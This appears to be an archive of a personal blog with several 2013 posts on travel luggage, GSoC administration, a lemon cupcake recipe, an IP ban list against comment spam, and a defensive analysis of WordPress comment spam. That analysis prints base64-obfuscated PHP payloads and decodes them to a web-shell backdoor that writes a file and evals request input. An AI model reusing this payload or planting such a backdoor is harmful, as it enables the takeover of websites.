terriko

Scooter luggage and travel cosplay.

Tue, 14 May 2013 09:36:34 GMT

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.

Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.

Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

comments

Smaller travel bags

Thu, 09 May 2013 18:44:59 GMT

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. Butnot arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and i realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)

I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.

I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.

comments

Falling down the rabbit hole: An analysis of some questionable blog spam

Mon, 06 May 2013 20:01:12 GMT

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.

So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9′));

Or this clearly related one (note that the top of the string is the same):


aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvKi1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qLygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9ENUpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2WTNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDOHFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxTHk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14UkNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5cFRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBdFFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLUzhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4aEtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJSGxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0YVF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjVz4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLUVNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEOW9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmKi8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZURm9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMeThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvKiAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qUyw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/PicpO2ZjbG9zZSgkZik7fQ==

As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"

(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));

Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=

You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"

Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));

So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));

Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to go to be a request that starts like this http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!

comments

Remove 80% of your blog comment spam by blocking IPTelligent!

Mon, 06 May 2013 18:29:54 GMT

I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built in lists for blocking comments, but they simply send to the moderation queue, as does popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*

Which covers the majority of the IP that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other ips that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN

comments

Updates and links

Mon, 06 May 2013 16:42:36 GMT

First some me-related updates:

I got to help staff a table at roborave on Saturday. fun! I was too busy to take pictures, so don't ask.

GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.

To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; horray for good timing!

And then some links that amused me:

Check out this awesome quote from the guy who introduced Sriracha sauce to the west.. Just scroll down; it's been helpfully put into the picture of Mr. David Tran. But the article itself is pretty interesting too.
You may have seen the link going around claiming that the Miss Korea contestants all look like clones. I chalked it up to some sort of racist "all Korean people look the same" nonsense, but this analysis of why they all look the same is pretty interesting. Short answer: makeup and photoshop by pageant folk. (Although I bet there's some racism involved in the spread of the link too.)
"Ship just got real." This is the most compelling smooth-jazz voiceover in a trailer for a turn-based boat game that you're going to see today. At least until you watch the second one, which has even more boat puns. J tells me that the game is actually pretty fun even though he only bought it because the trailer was hilarious.
Ever wanted to know if your interface is being messed with by a monkey? Android has you covered with isUserAMonkey().
Also, there exists a set of log.wtf functions in Android. Handy!

comments

Two interview questions I enjoyed

Thu, 25 Apr 2013 23:13:13 GMT

There's a longer, friends-locked post before this one talking about the interviews I had this week, but it occurs to me that the more general public might get a kick out of the two interview questions that most amused me:

My new favourite interview question:

Given this code...

if ( X ) 
  print("hello")
else 
  print("world")

What do you need to insert in place of X in order to get this code to print "helloworld" ?

And the second one:

If you're in a room with a light bulb that's on, how can you make it be off?

(This was asked shortly after they told me they were asking to see if I had the security mindset, which is a pretty huge clue as to the types of answers they were hoping to hear. I had a lot of fun with this.)

I am leaving my answers out of this post so that you can think about the possibilities yourselves, but of course feel free to discuss in the comments.

comments

Finding the best thing (without reading all the reviews)

Mon, 22 Apr 2013 00:15:21 GMT

I know geeks are stereotypically supposed to love drooling over new technology and comparing specs and stuff, but that's never really been my scene. There are things I care about enough to do research on, things I have particular requirements for that I want to meet, and then there's everything else. I don't want to buy/download/use crap, and I don't want to read breathless review after breathless review.

So I was really excited to hear about The Wirecutter, which purports to just list off the best thing (with a few alternatives) in various classes of things.

It's interesting, too, that it's got stuff like the big wait sign on this page right now which tells you that new stuff is coming so if you're not desperate, you might as well wait 'till they've been able to review the new things. Makes me feel a lot more reassured about the freshness of their information.

Used it for the first time yesterday to replace my defective point-and-shoot camera (which is a longer story, but one I'm not telling today) and it was fantastic to spend so little time making a decision. We'll see how it works out long run, but it's already saved me hours of my life and I came away feeling pretty close to as informed as I do after reading All The Reviews. Win!

comments

GSoC students: Doing the personal email thing right

Sat, 13 Apr 2013 15:47:13 GMT

So, after I threatened to make this my new form letter (FYI: I haven't, but I do cut and paste from it to make shorter, more personal answers) the first email I see from a student is, again, personally to me, but... he was totally doing it right. Posted to the mailing list, waited a bit for a response, checked to see who was talking about this idea last, saw it was me, then pinged me to ask if I'd seen the posts (which he linked to make it easier for me) and asked if I could help answer his questions.

I am so pleased. :)

And now, I'd best stop talking about how lovely the email is and get on to that part where I either answer him or deflect to a mentor who isn't quite so overwhelmed this weekend... Did I mention I'm going out of town tomorrow?

comments

The GSoC email that may become my new form letter

Thu, 11 Apr 2013 22:52:46 GMT

In case anyone was worried, no, I haven't actually started sending out form letters, but I am using this as a template I can cut & paste from for shorter, more personal emails to students.

Dear prospective student,

I've been getting a *lot* of personal emails/irc queries/IM messages since I took over as the organizational administrator for the Python Software Foundation. It's pretty neat because I'm really thrilled to see so many people excited about Google Summer of Code, but mostly, you shouldn't be contacting me directly.

If you're interested in one of the Python projects:

Take a look at the list of organizations running projects under the PSF:
http://wiki.python.org/moin/SummerOfCode/2013

Each one has a mailing list and sometimes an IRC channel associated with it. That is where you should be introducing yourself and asking questions.

If you are not sure who to contact for any reason, you should be asking on the soc2013-general mailing list. You can subscribe to this here:
http://mail.python.org/mailman/listinfo/soc2013-general/

If you're emailing me with regard to Systers and not a project under the Python Software Foundation, the same things apply only the relevant list is systers-dev, available here:
http://systers.org/mailman/listinfo/systers-dev

Why shouldn't you email me?

1. If you email the lists, lots of mentors from around the world will see your question. If I'm asleep or at work, they'll probably be able to answer it faster than I can.
2. If you email the lists and the person answering you answers on the list, it can benefit all the people who might have a similar question.
3. Chances are, I'm not going to be the mentor for your project, so there is someone out there who can answer your question better than I can.

Thanks very much, and good luck in your GSoC applications!

Terri

comments

Lemon Googe Cupcakes (or Lubricated Lemon Cupakes, if you prefer, but you probably don't)

Thu, 04 Apr 2013 22:18:58 GMT

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

I helpfully told my friend Adric that these cupcakes were my way of doing human testing without requiring IRB approval. Remember kiddies, experimental cupcakes are only one step away from mad science because my guinea pigs generally consent to the experiment!

Figure 1: Lemon Googe Cupcake without icing. Note the “clever” use of bad filter in attempt to disguise poor quality cell phone photo, as per cultural norms in a post-instagram world

Lemon Googe Cupcakes

These come in three parts; some assembly required. I made up the recipe as a whole based on my recollection and modification of recipes in my head / recipe card box, with some inspiration from the filled cupcakes in Vegan Cupcakes Take Over the World (although this is not a vegan recipe).

Lemon Cupcake

1/4 C (4 tbsp) butter

3/4 C sugar (1/2C is probably ok for this recipe if you want to cut back)

1 egg

1 tsp vanilla

Zest from one lemon

1/2 C milk

1 tsp baking powder

1 C flour

Cream butter and sugar together; add egg, vanilla, lemon zest and milk and stir well.

Add baking powder and flour and stir until smooth (but no longer).

Spoon into cupcake liners (or I use silicone molds), filling about halfway.

We made 16 cupcakes, you might want to fill a bit higher to get 12.

Bake at 350F for 20-25 minutes (10-15 min for mini cupcakes)

Lemon Googe Filling

The name comes via my Ottawa friends: for some reason we decided that “googe” best described the texture of those little gel cup sweets that are considered to be a choking hazard in the US. This nomenclature would probably have died out, but one of my friends was severely grossed out by the word, so we have used it to describe anything of a given gooey texture ever since.

You’ll note that this is more or less a lemon pie filling recipe, omitting the egg, or a slightly gooey lemon pudding.

1/4 C cornstarch

1/2 C cold water

1 C hot water (Or less if you want thicker googe)

Juice from one lemon

3/4 C icing sugar (or adjust this to taste)

~3 drops of yellow food colouring

Mix together cornstarch and cold water, then add mixture to hot water along with lemon juice and sugar and stir well. Heat in microwave repeatedly (around 30-45s per time), stirring after each heating, until mixture is thick and no taste of cornstarch remains. You can probably nuke it longer between stirrings, but if it boils once it’s thicker it might splatter all over your microwave, so keep an eye on it. Add food colouring, because normal lemon pie filling gets its colour from egg yolk and you want people to immediately think “lemon” and not “what the heck?” as they might have if you had allowed your lovely assistant to use the blue colouring like he wanted.

If you are making mini cupcakes or just don’t plan to lose as much to taste-testing for the sugar, you can probably halve the googe recipe. Or you can allow people to dip the cupcakes in the remaining googe like some sort of weird fondue; I don’t judge.

You can add sugar after the fact if you think it needs more — it’ll dissolve, and no one minds getting a blob of icing sugar. You can’t do this with the cornstarch, though.

Figure 2: A metric ton of lemon googe, prior to colouring. (Well, ok, it’s 400ml rounded up.) This may be an excessive amount of googe for a single batch of cupakes; see experimental notes below.

Cream Cheese Icing

4 oz regular cream cheese (half a package usually. Don’t use the spreadable stuff.)

1/4 C butter

1 tsp vanilla

Around 2 C icing sugar (or however much it takes until the consistency is correct)

I suspect you’re supposed to plan ahead for this and soften the butter and cream cheese in advance, but what I do is nuke those suckers together ’till they’re practically liquid and easy to stir (around 1 min), then add vanilla and sugar ’till it’s a slightly goopy icing consistency, and let it firm up as it cools. This strategy actually does make it easier to deal with the final icing in this case, since it’s easier to spread when a bit more liquid-y, but your mileage may vary.

You could probably put some lemon in here too, but at this point that seems like overkill.

Assembly instructions

Get an icing bag with a metal or plastic tip (sorry, this is one time that cutting the corner off a plastic bag probably isn’t enough). We’ll be using this to fill the cupcakes with lemon googe.

I chose a slightly too big tip, so my googe was spilling everywhere, and the lazy “I’m not sticking my hand in there to get a new tip because our kitchen sink broke this morning” solution was:

1. Stab the icing tip into the cupcake.

2. Spoon a tablespoon or so of googe into the bag.

3. Squeeze the googe into the cupcake, trying not to go right through to the bottom

Repeat, doing 1 more quickly subsequent times because you are dripping sticky slime all over the counter.

Yeay!

I had my lovely assistant do this part so it wasn’t bad for me at all, but you might want to save yourself the trouble and not use the largest icing tip you have on hand.

Figure 3: Lubricated lemon cupcakes. I’m pretty sure this monkier is not going to impress the friend who hates the word googe, but it’s more alliterative so it can be the alternate recipe name. Note the tools in the background include googe, an icing bag, and a place to put the icing bag so it doesn’t googe all over the counter.

You now have a cupcake with a gooey hole in it. I will refrain from juvenile jokes, but this may be the point where you’ll be really glad you used the food colouring so your lovely assistant will not think of juvenile jokes.

Cover your googe-filled cupcakes with cream cheese icing. This will be challenging because you’re basically holding a lubricated cupcake and the icing will slide off the hole in the center. Having experimented with this, I can tell you that it is easiest to ice the outside and then cover the googe last. It’s also fun to slime the top of the cupcake and layer the icing on that, which will add extra lemony goodness but is also really messy.

Figure 4: Lemon googe cupcakes, partially and fully prepared

The Lemon Googe Cupcake Experiments

Hypothesis: lemon googe, if inserted into the cupcake 24h+ in advance, will suffuse the cupcake making it more delicious.

Method:

16 cupcakes were created in the initial batch.

2 were assembled and eaten immediately and declared delicious by both experimental subjects J and T.

